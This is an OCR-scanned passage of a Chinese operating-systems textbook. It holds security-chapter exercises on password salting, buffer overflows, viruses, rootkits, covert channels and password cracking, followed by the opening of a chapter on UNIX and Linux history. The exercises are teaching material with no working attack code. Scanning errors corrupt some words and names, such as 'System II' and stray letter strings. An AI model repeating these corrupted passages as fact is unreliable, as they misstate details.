.在 得 到 学 位 证 书后 ， 你 申请 作为 一 个 大 学 计算 


中 心 的 管理 者 。 这 个 计算 中 心 正好 淘汰 了 旧 的 
主机 ， 转 用 大 型 的 LAN 服 务 器 并 运行 UNIX 系 
统 。 你 得 到 了 这 个 工作 。 工 作 开始 15 分 钟 后 ， 
你 的 助理 冲 进来 叫 道 :“ 有 的 学 生发 现 了 我 们 
用 来 加 密 密 码 的 算法 并 贴 在 Internet。” 那 么 你 
该 怎么 办 ? 

Morris-Thompson 采 用 n 位 随机 码 ( 盐 ) 的 保护 
模式 使 得 入 侵 者 很 难 发 现 大 量 事先 用 普通 字符 
串 加 密 的 密码 。 当 一 个 学 生 试图 从 自己 的 计算 
机 上 猜 出 超级 用 户 密 码 时 ， 这 一 结构 能 提供 安 
全 保护 吗 ? 假设 密码 文件 是 可 读 的 。 

假设 一 个 黑客 可 以 得 到 一 个 系统 的 密码 文件 。 
系统 使 用 有 m 位 salt 的 Morris-Thompson 保 护 机 
制 的 情况 相对 于 没有 使 用 这 种 机 制 的 情况 下 ， 
黑客 需要 多 少 额外 的 时 间 破 解 所 有 密码 。 

请 说 出 3 个 有 效 地 采用 生物 识别 技术 作为 登录 
认证 的 特征 。 


. 验证 机 制 大 致 可 以 分 为 三 类 : 用 户 所 知 ， 用 户 


所 有 以 及 用 户 所 是 。 设 若 一 套 验证 系统 采用 了 
上 述 三 类 机 制 。 例 如 ， 它 首先 要 求 用 户 输入 密 
码 登 录 ， 然 后 要 求 用 户 插入 身份 卡 〈 带 磁 条 ) 
并 输入 PIN 码 ， 最 后 要 求 用 户 提供 指纹 。 你 能 
阐述 此 设计 的 两 个 缺点 吗 ? 


. 某 个 计算 机 科学 系 有 大 量 的 在 本 地 网 络 上 的 


UNIX 机 器 。 任 何 机 器 上 的 用 户 都 可 以 以 


rexec machine4 who 


的 格式 发 出 命令 并 在 machine4 上 执行 ， 而 不 用 
远程 登录 。 这 一 结果 是 通过 用 户 的 核心 程序 把 
命令 和 UID 发 送 到 远程 计算 机 所 完成 的 。 在 这 
一 系统 中 ， 核 心 程序 是 可 信任 的 吗 ? 如 果 有 些 
计算 机 是 学 生 的 无 保护 措施 的 个 人 计算 机 呢 ? 


as 


33.Lamport 的 一 次 性 密码 技术 采用 的 逆序 密码 。 
这 种 方法 比 第 一 次 用 f (s)， 第 二 次 用 f F (5)) 并 
依次 类 推 的 方法 更 简单 吗 ? 

34. 使 用 MMU 硬 件 来 阻止 如 图 9-24 的 溢出 攻击 可 
行 吗 ? 解释 为 什么 ? 

35. 描述 堆栈 伪 随 机 数 机 制 如 何 工作 ;以 及 它 如 何 
被 攻击 者 所 绕 过 。 

36.TOCTOU 攻 击 利用 了 攻击 者 与 受害 者 之 间 的 竞 
争 条 件 。 一 种 针对 此 攻击 的 防御 手段 为 事务 化 
文件 系统 的 操作 。 解 释 此 手段 为 何 能 够 起 效 ， 
以 及 可 能 存在 的 问题 。 

37. 指出 C 编 译 器 的 某 项 功能 ， 它 可 以 消除 大 量 的 安 
全 漏洞 。 为 什么 这 没有 被 更 被 广泛 地 应 用 呢 ? 

38. 特洛伊 木马 能 够 攻击 应 用 权能 字 保 护 的 系统 吗 ? 

39. 当 一 个 文件 被 删除 时 ， 其 文件 块 只 是 简单 地 被 放 
回 空闲 列表 ,而 不 会 对 文件 块 中 的 内 容 进行 擦 除 。 
如 果 操作 系统 在 释放 文件 块 之 前 对 文件 块 的 内 容 
进行 清理 ， 你 认为 是 否 有 益 ? 综合 考虑 安全 与 性 
能 两 方面 的 要 求 ， 并 做 出 相应 的 解释 。 

40. 对 于 寄生 虫 病毒 来 说 : 

(a) 如 何 确定 它 会 在 主 程序 之 前 执行 ? 
(b) 在 病毒 执行 后 如 何 返 回 主 程序 ? 

41. 一些 操作 系统 需求 在 记录 开始 之 前 便 进行 硬盘 
分 区 ， 这 样 的 需求 为 什么 会 为 引导 扁 区 病毒 提 
供 生活 空间 ? 

42. 改变 图 9-28 中 的 程序 ， 使 其 能 够 找到 所 有 的 C 
程序 ， 而 不 是 所 有 的 执行 文件 。 

43. 图 9-33d 中 的 病毒 是 加 密 的 ， 反 病毒 实验 室 
中 的 科学 家 们 是 如 何 确定 其 解密 文件 并 逆 执 
行 的 呢 ? Virgil 可 以 做 什么 使 这 项 工作 的 难 
度 加 大 ? 

44. 图 9-33d 中 的 病毒 同时 拥有 压缩 器 与 解压 缩 器 ， 
解压 缩 器 是 用 来 释放 压缩 程序 的 ， 那 压缩 器 的 
作用 呢 ? 

45. 使 用 病毒 写 人 者 的 思想 为 一 个 多 形态 加 密 病毒 
命名 。 

46. 通常 系统 在 从 病毒 中 恢复 时 会 用 到 下 列 指令 : 
(1) 启动 被 感染 的 系统 。 

(2) 将 所 有 文件 备份 到 外 部 存储 介质 中 。 

(3) 运行 fdisk (或 类 似 的 程序 ) 来 格式 化 磁盘 。 
(4) 利用 原始 的 CD-ROM 重 新 安装 操作 系统 。 
(5) 将 外 部 存储 介质 中 的 文件 重新 载 入 计算 机 。 

47. 携带 性 病毒 可 以 在 UNIX 系 统 中 存在 吗 ? 如 果 
可 以 ， 请 解释 它 是 如 何 做 到 的 ， 如 果 不 能 ， 请 
说 明 原因 。 

48. 自我 提取 技术 通常 包含 一 个 或 多 个 压缩 文件 包 
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和 提取 程序 ， 它 经 常 被 用 于 子 程序 或 程序 升级 
中 ， 请 思考 该 技术 中 的 相关 安全 问题 。 

相对 于 病毒 和 蠕虫 ， 为 什么 rootkit 的 检测 更 加 
困难 ， 其 至 难以 实现 ? 
被 rootkit 注 入 的 计算 机 ， 只 是 简单 地 将 软件 状 
态 恢复 到 之 前 设置 的 恢复 点 ， 是 否 能 够 恢复 健 
康 状 态 ? 


:是 否 有 可 能 写 一 个 程序 ， 它 的 输入 是 另外 一 个 


程序 ， 输 出 是 输入 程序 中 是 否 存在 病毒 呢 ? 
9.10.1 节 中 描述 了 一 组 防火 墙 规则 ， 限 制 了 外 
部 只 能 接触 三 种 服务 ， 能 否 描述 你 可 以 向 该 防 
火 墙 中 添加 的 其 他 规则 ， 使 得 防火 墙 可 以 更 进 
一 步 地 限制 外 部 权限 及 服务 呢 ? 

在 一 些 机 器 上 ， 图 9-38b 中 使 用 的 SHR 指 令 使 
用 了 0 来 填充 未 使 用 的 bit， 以 确保 可 以 检查 其 
他 的 bit 数 据 是 否 正确 ， 对 于 9-38b 中 的 正确 性 
而 言 ， 哪 种 指令 可 以 被 使 用 ? 如 果 有 的 话 ， 哪 
个 更 好 ? 

为 了 验证 一 个 由 可 信任 的 供应 商 签名 的 程序 ， 
程序 供应 商 通 常 在 程序 中 加 入 带 有 可 信赖 的 第 
三 方 公 钥 的 签名 证 书 。 然 而 ， 为 了 读 取 这 个 证 
书 ， 用 户 需要 第 三 方 的 公 钥 。 这 可 以 由 可 信赖 
的 第 四 方 提供 ， 但 是 之 后 用 户 是 需要 这 个 公 铀 
的 。 看 起 来 并 没有 办 法 能 够 引导 验证 系统 ， 但 
现 有 的 浏览 器 使 用 了 这 种 技术 ， 这 是 如 何 做 到 
的 呢 ? 

描述 使 用 Java 语 言 创建 安全 程序 要 比 C 语 言 好 
的 三 个 特征 。 

假设 你 的 系统 正在 使 用 JDK 1.2。 展 示 你 用 于 
人 允许 www.appletsRus.com 上 的 应 用 程序 在 本 地 
机 器 上 执行 的 规则 ( 见 图 9-40) ， 这 个 应 用 程 
序 可 能 从 www.appletsRus.com 下 载 额 外 的 文 
件 ， 同 时 需要 在 /usr/tmp/ 文件 夹 下 进行 读 写 ， 
亦 会 从 /usr./me/appletdir 文件 夹 下 读 取 文件 。 
小 应 用 程序 (applet) 与 应 用 程序 (application ) 
的 区 别 是 什么 ? 这 种 区 别 与 安全 有 何 关系 ? 


.使 用 C 或 者 其 他 脚本 语言 写 一 对 程序 ， 使 得 它 


们 可 以 发 送 和 接收 UNIX 系 统 中 隐蔽 信道 的 信 
息 。( 提 示 : 即使 文件 不 可 使 用 时 ， 权 限 位 依然 
可 见 ，sleep 命 令 或 系统 调用 会 保证 拖延 一 段 时 
间 ， 这 由 设置 的 参数 所 决定 。) 在 空闲 系统 上 测 
量 数据 率 ， 之 后 再 在 满载 系统 上 测试 数据 率 。 

几 种 UNIX 系 统 使 用 DES 算 法 来 加 密 密 码 ， 这 
些 系 统 通 常 在 加 密 密 码 的 流程 上 被 使 用 25 次 。 
在 互联 网 上 下 载 DES 的 实现 ， 然 后 写 一 个 程序 
来 加 密 密 码 ， 检 测 对 于 这 样 的 一 个 系统 来 说 密 
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码 是 否 可 用 。 使 用 Morris-Thomson 算 法 生成 10 

个 加 密 密 码 加 以 保护 ， 请 在 你 的 系统 中 使 用 16 

位 的 密码 机 制 。 

假设 一 个 系统 使 用 ACL 来 维护 它 的 防护 矩阵 。 

请 写 一 组 ACL 的 管理 函数 以 使 下 列 情况 发 生 

时 ，ACL 可 以 被 正确 使 用 : 

(1) 创建 新 对 象 。 

(2) 删除 对 象 。 

(3) 创建 新 域 。 

(4) 删除 域 。 

(5) 为 域 赋予 新 的 权限 (r、w、x 的 组 合 ) 以 
控制 一 个 对 象 。 


RIF 


(6) 撤销 某 个 域 对 对 象 的 控制 权限 。 

(7) 对 于 所 有 域 生 成 新 的 控制 权限 以 控制 对 
象 。 

(8) 对 于 所 有 域 撤销 对 对 象 的 控制 权限 。 

61. 实现 9.7.1 小 节 的 代码 ， 观 察 缓冲 区 溢出 时 会 发 
生 什么 ， 并 测试 不 同 长 度 的 字符 串 。 

62. 编写 一 段 程序 来 模拟 9.9.2 小 节 “ 可 执行 的 病毒 ” 
下 的 重 写 病 毒 (overwriting virus ) 。 选 择 一 个 
能 够 被 重 写 但 无 风险 的 可 执行 文件 。 针 对 病毒 
程序 的 二 进 制 代码 ， 选 择 一 个 无 害 的 可 执行 文 
件 的 二 进 制 代码 。 
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实例 研究 1: UNIX、Linux 和 Android 





在 前 面 的 章节 中 ， 我 们 学 习 了 很 多 关于 操作 系统 的 原理 、 抽 象 、 算 法 和 技术 。 现 在 分 析 一 些 具体 的 
操作 系统 ， 看 一 看 这 些 原理 在 现实 世界 中 是 怎样 应 用 的 。 我 们 将 从 Linux 开 始 ， 它 是 UNIX 的 一 个 很 流行 的 
衍生 版 本 ， 可 以 运行 在 各 类 计算 机 上 。 它 不 仅 是 高 端 工 作 站 和 服务 器 上 的 主流 操作 系统 之 一 ， 还 在 智能 
手机 (Android 是 基于 Linux 的 一 种 手机 操作 系统 ) 和 超级 计算 机 等 一 系列 系统 中 得 到 应 用 。Linux 系 统 也 
体现 了 很 多 重要 的 操作 系统 设计 原理 。 

我 们 将 从 Linux 的 历史 以 及 UNIX 与 Linux 的 演化 开始 讨论 ， 然 后 给 出 Linux 的 概述 ， 从 而 使 读者 对 它 
的 使 用 有 一 些 概念 。 这 个 概述 对 那些 只 熟悉 Windows 系 统 的 读者 尤为 有 用 ， 因 为 Windows 系 统 实际 上 对 
使 用 者 隐藏 了 几乎 所 有 的 系统 细节 。 虽 然 图 形 界面 可 以 使 初学 者 很 容易 上 手 ， 但 它 的 灵活 性 较 差 而 且 不 
能 使 用 户 洞察 到 系统 是 如 何 工 作 的 。 

接 下 来 是 本 章 的 核心 内 容 ， 我 们 将 分 析 Linux 的 进程 与 内 存 管理 、IO、 文 件 系统 以 及 安全 机 制 。 对 
于 每 个 主题 ， 我 们 将 先 讨 论 基 本 概念 ， 然 后 是 系统 调用 ， 最 后 讨论 实现 机 制 。 

我 们 首先 应 该 解决 的 问题 是 : 为 什么 要 用 Linux 作 为 例子 ? 的 确 ，Linux 是 UNIX 的 一 个 衍生 版 本 ， 但 
UNIX 自 身 有 很 多 版 本 ， 还 有 很 多 其 他 的 衍生 版 本 ， 包 括 AIX、FreeBSD、HP-UX、SCO UNIX, System 
VSolaris 等 。 幸 运 的 是 ， 所 有 这 些 系统 的 基本 原理 与 系统 调用 大 体 上 是 相同 的 (在 设计 上 )。 此 外 ， 它 们 的 总 
体 实 现 策略 、 算 法 与 数据 结构 也 很 相似 ， 不 过 也 有 一 些 不 同 之 处 。 为 了 使 我 们 的 例子 更 具体 ， 最 好 选 定 一 
个 系统 然后 从 始 至 终 地 对 它 进行 讨论 。 因 为 大 多 数 读 者 相对 于 其 他 系统 而 言 更 容易 接触 到 Linux， 故 我 们 选 
中 Linux 作 为 例子 。 况 且 除 了 实现 相关 的 内 容 ， 本 章 的 大 部 分 内 容 对 所 有 UNIX 系 统 都 是 适用 的 。 有 很 多 书籍 
介绍 怎样 使 用 UNIX, 但 也 有 一 些 书 籍 介绍 其 高 级 特性 以 及 系统 内 核 (Love, 2013; McKusick 和 Neville-Neil， 
2004，Nemeth 等 人 ，2013，Ostrowick，2013，Sobell，2014;，Stevens 和 Rago，2013，Vahalia，2007) 。 


10.1 UNIX 与 Linux 的 历史 


UNIX 与 Linux 有 一 段 漫长 而 又 有 趣 的 历史 ， 因 此 我 们 将 从 这 里 开始 我 们 的 学 习 。UNIX 开 始 只 是 一 
个 年 轻 的 研究 人 员 (Ken Thompson) 的 业余 项 目 ， 后 来 发 展 成 价值 数 十 亿美 元 的 产业 ， 涉 及 大 学 、 跨 
国 公司 、 政 府 与 国际 标准 化 组 织 。 在 接 下 来 的 内 容 里 我 们 将 展开 这 段 历史 。 

10.1.1 UNICS 

回 到 20 世 纪 40 一 50 年 代 ， 当 时 所 有 计算 机 都 是 个 人 计算 机 ， 使 用 计算 机 的 标准 方式 是 签约 租用 一 个 
小 时 的 机 时 ， 然 后 在 这 个 小 时 内 独占 整 台 机 器 。 至 少 从 这 个 角度 ， 所 有 的 计算 机 都 是 个 人 计算 机 。 当 然 ， 
这 些 机 器 体积 庞大 ， 在 任何 时 候 只 有 一 个 人 (程序 员 ) 能 使 用 它们 。 当 批 处 理 系统 在 20 世 纪 60 年 代 兴 起 
时 ， 程 序 员 把 任务 记录 在 打 和 孔 卡 片上 并 提交 到 机 房 。 当 机 房 积 累 了 足够 的 任务 后 ， 将 由 操作 员 在 一 次 批 
处 理 中 处 理 。 这 样 ， 往 往 在 提交 任务 一 个 甚至 几 个 小 时 后 才能 得 到 结果 。 在 这 种 情况 下 ， 调 试 成 为 一 个 
费时 的 过 程 ， 因 为 一 个 错位 的 逗号 都 会 导致 程序 员 浪费 数 小 时 。 

为 了 摆脱 这 种 公认 的 令 人 失望 且 没 有 效率 的 设计 ，Dartmouth 学 院 与 M.I.T 发 明了 分 时 系统 。 
Dartmouth 的 系统 只 能 运行 BASIC, 并 且 经 历 了 短暂 的 商业 成 功 后 就 消失 了 。M.I.T 的 系统 CTSS 用 途 广 泛 ， 
在 科学 界 取得 了 巨大 的 成 功 。 不 久之 后 ， 来 自 Bell 实 验 室 与 通用 电器 (随后 成 为 计算 机 的 销售 者 ) 的 研 
究 者 与 M.I.T 合 作 开 始 设 计 第 二 代 系 统 MULTICS (MULTiplexed Information and Computing Service, 多 
路 复 用 信息 与 计算 服务 )， 我 们 在 第 一 章 讨论 过 它 。 

虽然 Bell 实 验 室 是 MULTICS 项 目的 创始 方 之 一 ， 但 是 它 后 来 撤 出 了 这 个 项 目 ， 仅 留 下 一 位 研究 人 员 
Ken Thompson 寻 找 一 些 有 意思 的 东西 继续 研究 。 他 最 终 决 定 在 一 台 废 弃 的 PDP-7 小 型 机 上 自己 写 一 个 精 
简 版 的 MULTICS (当时 使 用 汇编 语言 )。 尽 管 PDP-7 体 积 很 小 ， 但 是 Thompson 的 系统 确实 可 以 正常 运行 
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并 且 能 够 支持 他 的 开发 工作 。 随 后 ，Bell 实 验 室 的 另 一 位 研究 者 Brian Kernighan 有 点 开玩笑 地 把 它 叫 作 
UNICS (UNiplexed Information and Computing Service， 单 路 信息 与 计算 服务 )。 尽 管 “EUNUCHS” 的 
双关 语 是 对 MULTICS 的 删 减 ， 但 是 这 个 名 字 保 留 了 下 来 ， 虽 然 其 拼写 后 来 变 成 了 UNIX。 


10.1.2 PDP-11 UNIX 

Thompson 的 工作 给 他 在 Bell 实 验 室 的 同事 留 下 了 深刻 的 印象 ， 很 快 Dennis Ritchie 加 入 进来 ， 接 着 
是 他 所 在 的 整个 部 门 。 在 这 段 时 间 ，UNIX 系 统 有 两 个 重大 的 发 展 。 第 一 ，UNIX 从 过 时 的 PDP-7 计 算 机 
移植 到 更 现代 化 的 PDP-11/20， 然 后 移植 到 PDP-11/45 和 PDP-11/70。 后 两 种 机 器 在 20 世 纪 70 年 代 占 据 了 
小 型 计算 机 的 主要 市 场 。PDP-11/45 和 PDP-11/70 的 功能 更 为 强大 ， 有 着 在 当时 条 件 下 算是 容量 很 大 的 物 
HAF (分 别 为 236KB 与 2MB ) 。 同 时 ， 它 们 有 内 存 保护 硬件 ， 从 而 可 以 同时 支持 多 个 用 户 。 然 而 ， 它 
们 都 是 16 位 机 器 ， 从 而 限制 了 单个 进程 只 能 拥有 64KB 的 指令 空间 和 64KB 的 数据 空间 ， 即 使 机 器 能 够 提 
供 远大 于 此 的 物理 内 存 。 

第 二 个 发 展 则 与 编写 UNIX 的 编程 语言 有 关 。 那 时 ， 为 每 台新 机 器 重 写 整个 系统 显然 是 一 件 很 无 趣 
的 事情 ， 因 此 Thompson 决 定 用 自己 设计 的 一 种 高 级 语言 B 重 写 UNIX。B 是 BCPL 的 简化 版 (BCPL 自 己 
是 CPL 的 简化 版 ， 而 CPL 就 像 PL/I 一 样 从 来 没有 好 用 过 )。 由 于 B 的 种 种 缺陷 ， 尤 其 是 缺乏 数据 结构 ， 这 
次 尝试 并 不 成 功 。 接 着 Ritchie 设 计 了 B 语 言 的 后 继 者 ， 很 自然 地 命名 为 C。Ritchie 同 时 为 C 编 写 了 一 个 出 
色 的 编译 器 。Thompson 和 Ritchie 一 起 工作 ， 用 C 重 写 了 UNIX。C 是 恰当 的 时 间 出 现 的 一 种 恰当 的 语言 ， 
从 此 统治 了 操作 系统 编程 。 

1974 年 , Ritchie 和 Thompson 发 表 了 一 篇 关于 UNIX 的 里 程 碑 式 的 论文 (Ritchie 和 Thompson, 1974) 。 
由 于 他 们 在 论文 中 介绍 的 工作 ， 他 们 随后 获得 了 享有 盛誉 的 图 灵 奖 (Ritchie, 1984, Thompson, 1984), 
这 篇 论文 的 发 表 使 许多 大 学 向 Bell 实 验 室 索要 UNIX 的 副本 。 由 于 Bell 实 验 室 的 母 公 司 AT&T 在 当时 作为 
垄断 企业 受到 监管 ， 不 允许 经 营 计算 机 业务 ， 它 很 愿意 能 够 通过 向 大 学 出 售 UNIX 获 取 适 度 的 费用 。 

一 个 偶然 事件 往往 能 够 决定 历史 。PDP-11 正 好 是 几乎 所 有 大 学 的 计算 机 系 选择 的 计算 机 ， 而 PDP- 
11 预 装 的 操作 系统 使 大 量 的 教授 与 学 生 望 而 生 县 。UNIX 很 快 地 填补 了 这 个 空白 。 这 在 很 大 程度 上 是 因 
为 UNIX 提 供 了 全 部 的 源 代码 ， 人 们 可 以 (实际 上 也 这 么 做 了 ) 不 断 地 进行 修补 。 大 量 科学 会 议 围 绕 
UNIX 举 行 ， 在 会 上 杰出 的 演讲 者 们 站 在 台 上 介绍 他 们 在 系统 核心 中 找到 并 改正 的 隐蔽 错误 。 一 位 澳 大 
利 亚 教授 John Lions Hii WA AFF (Chaucer) 或 莎士比亚 (Shakespeare) 作品 保留 的 格式 为 UNIX 的 
源 代码 编写 了 注释 (1996 年 以 Lions 的 名 义 重 新 印刷 )。 这 本 书 介绍 了 版 本 6， 之 所 以 这 么 命名 是 因为 它 
出 现在 UNIX 程 序 员 手 册 的 第 6 版 中 。 源 代码 包含 8200 行 C 代 码 以 及 900 行 汇编 代码 。 由 于 以 上 所 有 活动 
的 开展 ， 关 于 UNIX 系 统 的 新 想法 和 改进 迅速 传播 开 来 。 

在 几 年 内 ， 版 本 6 被 版 本 7 代替 ， 后 者 是 UNIX 的 第 一 个 可 移植 版 本 (运行 在 PDP-11 以 及 Interdata 
8/32 上 ) ， 已 经 有 18 800 行 C 代 码 以 及 2100 行 汇编 代码 。 版 本 7 培养 了 整整 一 代 的 学 生 ， 这 些 学 生 毕业 去 
业界 工作 后 促进 了 它 的 传播 。 到 了 20 世 纪 80 年 代 中 期 ， 各 个 版 本 的 UNIX 在 小 型 机 与 工程 工作 站 上 已 广 
为 使 用 。 很 多 公司 甚至 买 下 源 代码 版 权 开 发 自己 的 UNIX 版 本 ， 其 中 有 一 家 年 轻 小 公司 叫 作 Microsoft 
(微软 )， 它 以 XENIX 的 名 义 出 售 版 本 7 好 几 年 了 ， 直 到 它 的 兴趣 转移 到 了 其 他 方向 上 。 


10.1.3 可 移植 的 UNIX 

UNIX 是 用 C 编 写 的 ， 因 而 将 它 移植 到 一 台新 机 器 上 比 之 前 用 汇编 语言 编写 的 系统 移植 要 容易 多 了 。 
移植 首先 需要 为 新 机 器 写 一 个 C 编 译 器 ， 然 后 需要 为 新 机 器 的 VO 设备 ， 如 显示 器 、 打 印 机 、 磁 盘 等 编写 
设备 驱动 。 虽 然 驱动 的 代码 是 用 C 写 的 ， 但 由 于 没有 两 个 磁盘 按照 同样 的 方式 工作 ， 它 不 能 被 移植 到 另 
一 台 机 器 ， 并 在 那 台 机 器 上 编译 运行 。 最 终 ， 一 小 部 分 依赖 于 机 器 的 代码 ， 如 中 断 处 理 或 内 存 管理 程序 ， 
必须 重 写 ， 通 常 使 用 汇编 语言 。 

系统 第 一 次 向 外 移植 是 从 PDP-11 到 Interdata 8/32 小 型 机 上 。 这 次 实践 显示 出 UNIX 在 设计 时 暗含 了 
一 大 批 关于 系统 运行 机 器 的 假设 ,例如 假设 整 型 的 大 小 为 16 位 ， 指 针 的 大 小 也 是 16 位 (上 暗示 程序 最 大 容 
量 为 64KB)， 还 有 机 器 刚好 有 三 个 寄存 器 存放 重要 的 变量 。 这 些 假设 没有 一 个 与 Interdata 机 器 的 情况 相 
符 ， 因 此 整理 修改 UNIX 需 要 大 量 的 工作 。 

另 一 个 问题 来 自 Ritchie 的 编译 器 。 尽 管 它 速度 快 ， 能 够 产生 高 质量 的 目标 代码 ， 但 这 些 代码 只 是 基 
于 PDP-11 机 器 。 有 别 于 针对 Interdata 机 器 写 一 个 新 编译 器 的 通常 做 法 ，Bell 实 验 室 的 Steve Johnson 设 计 
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并 实现 了 可 移植 的 C 编 译 器 ， 只 需要 适量 的 修改 工作 就 能 够 为 任何 设计 合理 的 机 器 生成 目标 代码 。 多 年 
以 来 ,除了 PDP-11 以 外 几乎 所 有 机 器 的 C 编 译 器 都 是 基于 Johnson 的 编译 器 ， 因 此 Johnson 的 工作 极 大 地 
促进 了 UNIX 在 新 计算 机 上 的 普及 。 

由 于 开发 工作 必须 在 唯一 可 用 的 UNIX 机 器 PDP-11 上 进行 ， 这 台 机 器 正好 在 Bell 实 验 室 的 第 五 层 ， 
而 Interdata 在 第 一 层 ， 因 此 最 初 向 Interdata 机 器 的 移植 进度 缓慢 。 生 成 一 个 新 版 本 意味 着 在 五 楼 编译 ， 
然后 把 一 个 磁带 搬 到 一 楼 去 检查 这 个 版 本 是 否 能 用 。 在 搬 了 几 个 月 的 磁带 后 ， 有 人 提出 :“ 要 知道 我 们 
是 一 家 电话 公司 ， 为 什么 我 们 不 把 两 台 机 器 用 电线 连接 起 来 ? ”因此 ，UNIX 网 络 诞生 了 。 在 被 移植 到 
Interdata 之 后 ，UNIX 又 被 移植 到 VAX 和 其 他 计算 机 上 。 

在 AT&T 于 1984 年 被 美国 政府 拆 分 后 ， 它 获得 了 设立 计算 机 子 公司 的 法 律 许可 ， 并 且 这 样 做 了 。 不 
久 ，AT&T 发 布 了 第 一 个 商业 化 的 UNIX 产 品 System II。 它 并 设 有 被 很 好 地 接受 ， 因 此 在 一 年 之 后 
就 被 一 个 改进 的 版 本 System V 取 代 。 关 于 System IV 发 生 了 什么 是 计算 机 科学 史上 最 大 的 未 解 之 谜 之 一 。 
最 初 的 System V 很 快 就 被 System V 的 第 2 版 ， 第 3 版 ， 接 着 是 第 4 版 取代 ， 每 一 个 新 版 本 都 更 加 庞大 和 复 
杂 。 在 这 个 过 程 中 ，UNIX 系 统 背 后 的 初始 思想 ， 即 一 个 简单 、 精 致 的 系统 ， 逐 渐 地 消失 了 。 虽 然 
Ritchie 与 Thompson 的 小 组 之 后 开发 了 UNIX 的 第 8、 第 9 与 第 10 版 ， 由 于 AT&T 把 所 有 的 商业 力量 都 投入 
到 推广 System V 中 ， 它 们 并 没有 得 到 广泛 的 传播 。 然 而 ，UNIX 的 第 8、 第 9 与 第 10 版 的 部 分 思想 被 最 终 
包含 在 System V 中 。AT&T 最 后 决定 ， 它 毕竟 是 一 家 电话 公司 而 不 是 一 家 计算 机 公司 ， 因 此 在 1993 年 把 
UNIX 的 生意 在 1993 年 卖 给 了 Novell。Novell 随 后 在 1995 年 把 它 又 卖 给 了 Santa Cruz Operation, AEE 
拥有 UNIX 的 生意 已 经 无 关 紧 要 了 ， 因 为 所 有 主要 的 计算 机 公司 都 已 经 拥有 了 其 许可 证 。 

10.1.4 Berkeley UNIX 

加 州 大 学 伯克利 分 校 (University of California at Berkeley) 是 早期 获得 UNIX 第 6 版 的 众多 大 学 之 
一 。 由 于 获得 了 整个 源 代 码 ，Berkeley 可 以 对 系统 进行 充分 的 修改 。 在 ARPA (Advanced Research Project 
Agency，( 美 国 国防 部 ) 高 级 研究 计划 署 ) 的 赞助 下 ，Berkeley 开 发 并 发 布 了 针对 PDP-11 的 UNIX 改 进 版 
本 ， 称 为 1BSD (First Berkeley Software Distribution ，Berkeley 软 件 发 行 第 1 版 ) 。 这 个 版 本 之 后 很 快 有 
另 一 个 版 本 紧 随 ， 称 作 2BSD， 它 也 是 为 PDP-11 开 发 的 。 

更 重要 的 版 本 是 3BSD， 尤 其 是 其 后 继 者 ， 为 VAX 开 发 的 4BSD。AT&T 发 布 了 一 个 VAX 上 的 UNIX 
版 本 称 为 32V， 虽 然 这 个 版 本 本 质 上 是 UNIX 第 7 版 ， 但 是 ， 相 比 之 下 ，4BSD 包 含 一 大 批改 进 。 最 重要 的 
改进 是 应 用 了 虚拟 内 存 与 分 页 ; 使 得 程序 能 够 按照 需求 将 其 一 部 分 调 入 或 调 出 内 存 ， 从 而 使 程序 能 够 比 
物理 内 存 更 大 。 另 一 个 改进 是 允许 文件 名 长 于 14 个 字符 。 文 件 系 统 的 实现 方式 也 发 生 了 变化 ， 其 速度 得 
到 了 显著 的 提高 。 信 号 处 理 变 得 更 为 可 靠 。 网 络 的 引入 使 得 其 使 用 的 网 络 协议 TCP/IP 成 为 UNIX 世 界 的 
实际 标准 。 因 为 Internet 被 基于 UNIX 的 服务 器 统治 ，TCP/IP 接 着 也 成 为 Internet 的 实际 标准 。 

Berkeley 也 为 UNIX 添 加 了 许多 应 用 程序 ， 包 括 一 个 新 的 编辑 器 (vi)、 一 个 新 的 shell (csh) Pascal 
与 Lisp 的 编译 器 ， 以 及 很 多 其 他 程序 。 所 有 这 些 改进 使 得 Sun Microsystems，DEC 以 及 其 他 计算 机 销售 
商 基 于 Berkeley UNIX 开 发 它们 自己 的 UNIX 版 本 ， 而 不 是 基于 AT&T 的 “官方 ”版 本 System V。 因 此 
Berkeley UNIX 在 教学 、 研 究 以 及 国防 领域 的 地 位 得 到 确立 。 如 果 希 望 得 到 更 多 关于 Berkeley UNIX 的 信 
息 ， 请 查阅 参考 文献 (McKusick $A, 1996), 


10.1.5 标准 UNIX 

在 20 世 纪 80 年 代 后 期 ， 两 个 不 同 且 一 定 程度 上 不 相 兼 容 的 UNIX 版 本 (4.3BSD 与 System V 第 3 版 ) 
得 到 广泛 使 用 。 另 外 ， 几 乎 每 个 销售 商都 会 增加 自己 的 非 标准 增强 特性 。UNIX 世 界 的 这 种 分 裂 ， 加 上 
二 进 制程 序 格式 没有 标准 的 事实 ， 使 得 任何 软件 销售 商 编写 和 打包 的 UNIX 程 序 都 不 可 能 在 其 他 UNIX 系 
统 上 运行 (正如 MS-DOS 所 做 的 一 样 )， 从 而 极 大 地 阻碍 了 UNIX 的 商业 成 功 。 各 种 各 样 标准 化 UNIX 的 
尝试 一 开始 都 失败 了 。 一 个 典型 的 例子 是 AT&T 发 布 的 SVID (System V Interface Definition, System 5 
界面 定义 )， 它 定义 了 所 有 的 系统 调用 、 文 件 格 式 等 。 这 个 标准 尝试 使 所 有 System V 的 销售 商 保持 一 致 ， 
然而 它 在 敌对 阵营 (BSD) 中 直接 被 忽略 ， 没 有 任何 效果 。 

第 一 次 使 UNIX 的 两 种 流派 一 致 的 严肃 尝试 来 源 于 IEEE ( 它 是 一 个 得 到 高 度 尊重 的 中 立 组 织 ) 标准 
委员 会 的 赞助 。 有 上 百名 来 自 业 界 、 学 界 以 及 政府 的 人 员 参 加 了 此 项 工作 。 他 们 共同 决定 将 这 个 项 目 命 
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名 为 POSIX。 前 三 个 字母 代表 可 移植 操作 系统 (Portable Operating System)， 后 缀 I[X 用 来 使 这 个 名 字 与 
UNIX 的 构 词 相 似 。 

经 过 一 次 又 一 次 的 争论 与 辩驳 之 后 ，POSIX 委 员 会 制定 了 一 个 称 为 1003.1 的 标准 。 它 规定 了 每 一 个 
符合 标准 的 UNIX 系 统 必须 提供 的 库 函 数 。 大 多 数 库 函数 会 引发 系统 调用 ,但 也 有 一 些 可 以 在 系统 内 核 之 
外 实现 。 典 型 的 库 函 数 包括 open，read 与 fork。POSIX 的 思想 是 这 样 的， 一 个 软件 销售 商 写 了 一 个 只 调用 
了 符合 1003.1 标 准 函 数 的 程序 ， 那 么 他 就 可 以 确信 这 个 程序 可 以 在 任何 符合 标准 的 UNIX 系 统 上 运行 。 

